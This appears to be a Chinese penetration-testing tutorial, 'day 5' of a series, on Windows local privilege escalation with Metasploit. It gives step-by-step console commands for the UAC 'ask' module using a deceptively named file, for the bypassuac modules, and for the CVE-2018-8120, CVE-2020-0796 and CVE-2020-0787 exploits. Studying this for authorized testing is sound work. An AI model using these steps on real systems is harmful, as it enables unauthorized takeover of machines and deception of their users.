msf本地提权

1. 利用uac提权

前提与目标机建立会话连接

内网渗透 day5-msf本地提权(windows)

seach local/ask     搜索关键字local/ask  

内网渗透 day5-msf本地提权(windows)

use 0      进入到exploit/windows/local/ask模块下

内网渗透 day5-msf本地提权(windows)

show options 查看相关参数

内网渗透 day5-msf本地提权(windows)

set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)

内网渗透 day5-msf本地提权(windows)

set session 1     设置会话窗口(先查看一下会话的id)

内网渗透 day5-msf本地提权(windows)

run执行

内网渗透 day5-msf本地提权(windows)

目标机弹出弹窗

内网渗透 day5-msf本地提权(windows)

点击是后,成功进入meterpreter命令行

内网渗透 day5-msf本地提权(windows)

这时候getsystem就可以成功提权

内网渗透 day5-msf本地提权(windows)

2. 绕过uac认证

search bypassuac     搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)

内网渗透 day5-msf本地提权(windows)

use 3     进入编号为3的提权脚本模块

内网渗透 day5-msf本地提权(windows)

show opthions 查看相关参数

内网渗透 day5-msf本地提权(windows)

查看会话并且设置会话

内网渗透 day5-msf本地提权(windows)

show targets 显示可选平台

内网渗透 day5-msf本地提权(windows)

set target 0       设置为X86

内网渗透 day5-msf本地提权(windows)

run 执行

内网渗透 day5-msf本地提权(windows)

提权成功

内网渗透 day5-msf本地提权(windows)

3. 利用windows本地提权漏洞进行提权

cve-2018-8120

search cve-2018-8120   查找关键字

内网渗透 day5-msf本地提权(windows)

use 0 进入该模块

内网渗透 day5-msf本地提权(windows)

show options 查看相关参数

内网渗透 day5-msf本地提权(windows)

session 查看会话

内网渗透 day5-msf本地提权(windows)

设置为没有权限的会话3

内网渗透 day5-msf本地提权(windows)

进入后直接获得管理员权限

内网渗透 day5-msf本地提权(windows)

cve-2020-0796

同上

内网渗透 day5-msf本地提权(windows)

内网渗透 day5-msf本地提权(windows)

内网渗透 day5-msf本地提权(windows)

内网渗透 day5-msf本地提权(windows)

由于我win10更新过有补丁了

cve-2020-0787

内网渗透 day5-msf本地提权(windows)

内网渗透 day5-msf本地提权(windows)

提权后操作

内网渗透 day5-msf本地提权(windows)

相关文章: